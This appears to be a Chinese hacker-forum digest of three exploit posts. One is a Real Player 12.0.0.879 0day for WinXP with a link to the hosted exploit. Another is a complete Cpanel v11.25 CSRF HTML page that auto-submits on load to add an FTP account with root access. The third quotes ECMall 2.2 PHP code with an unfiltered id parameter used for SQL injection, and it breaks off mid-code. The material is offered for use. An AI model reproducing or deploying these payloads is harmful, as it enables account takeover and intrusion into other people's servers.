【Oday】Real Player 12.0.0.879 0day for WinXP

# Exploit Title: Real Player 12.0.0.879 0day for WinXP # Date: 09/07/2010 # Author: webDEViL # Version: 12.0.0.879 # Tested on: WinXP       This bug utilizes Microsoft Help vuln for RCE. You can test by browsing to http://krash.in/real-exp/exploit.ram    http://www.exploit-db.com/sploits/rp-0day-08-07-2010.tar       --webDEViL

【Exp】Cpanel v11.25 CSRF 添加管理员账号exp

Cpanel v11.25 CSRF 添加管理员账号漏洞。 Exploite: <html> <body onload="javascript:fireForms()"> <form method="POST" name="form0" action="http://server:2082/frontend/x3/ftp/doaddftp.html"> <input type="hidden" name="login" value="name"/> <input type="hidden" name="password" value="pass"/> <input type="hidden" name="password2" value="pass"/> <input type="hidden" name="homedir" value="/"/> <input type="hidden" name="quota" value="unlimited"/> </form> </body> </html>   发布作者:G0D-F4Th3r ,由黑小子整理编辑 影响

【转载】ECMall 2.2延迟注射0day

ECMall 2.2延迟注射0day     function index()     {         $id = empty($_GET['id']) ? 0 : $_GET['id'];  //id未过滤         if (!$id)         {             $this->show_warning('no_such_groupbuy');             return false;         }         // 团购信息         $group = $this->_groupbuy_mod->get(array(             'conditions' => 'group_id=' . $id . ' AND gb.state<>' . GROUP_PENDING,   //好的